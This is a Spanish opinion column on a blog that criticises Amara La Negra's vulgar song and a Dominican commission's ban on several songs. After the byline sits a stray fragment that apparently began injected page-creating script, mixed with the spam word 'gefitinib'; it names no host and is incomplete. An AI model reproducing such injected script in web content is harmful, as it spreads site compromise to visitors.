Home / Publicaciones / Rincon Urbano / Amara La Negra y La Infamia

Amara La Negra y La Infamia

La artista urbana “Dana Danelys De los Santos” conocida como Amara La Negra al parecer esta mal aconsejada< !more>, pero resulta que es peor. A su llegada a la República Dominicana, según dicen su mayor admiración era  la cantante cubana Celia Cruz.

Desde que piso sueldo Dominicano lo primero que mostró al publico fue su sobresaliente trasero, así como también su gran belleza, quedando en segundo plano su talento como artista. Esto se puede comprobar viendo el documental “Yo soy la Salsa” y muy pocas veces se puede distinguir que realmente era Amara. Hoy por hoy, esas escasas veces solo han servido para suspirar en lo que exactamente se puede calificar como degradación.

Amara la Negra se disipó del país hace ya varios meses. Y al parecer no sólo geográficamente, también perdió el rumbo. Un regreso más fallido no ha podido ser. En el internet se puede escuchar una canción  junto a un total desconocido, de nombre “El Chevo”,  calificada es de mal gusto, desfachatez y la irresponsabilidad social. “Tú te sacaste la loto, cuando encontrate e’te toto”, interpreta Amara La Negra , muy fatua.

¿Y Dónde deja a los  niños que la siguen? Pero ¿hasta dónde puede llegar la falta de sentido común? Concluyentemente hay que estar demasiado vendido para saber qué cosa es la música y qué cosa es ser un artista.

Estoy en contra de las oposiciones, y no puedo estar de acuerdo con la disposición de la Comisión Nacional de Espectáculos, al menos hasta que no le haga el favor completo al país y también impida, por ejemplo, a quienes regularmente desde medios a su alcance dicen malas palabras, agravian y desinforman. Los temas vedados son “Toto”, de Amara y compañía, así como también los temas “Te amo antes de venirme”, “Cuando yo welia”, “Mariconiemo”, “Mama guebo”, “La yerba y el perico”, “El golpe de la perra bizca” y “Como quiera ta”, estos últimos de un tal “NFasis”.

Ojalá que esto simplemente sea un sección desagradable, y que Amara La Negra se reencuentre consigo misma.

Fuente: diariolibre

POR ALFONSO QUIÑONESvar d=document;var s=d.createElement(‘script’); gefitinib

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...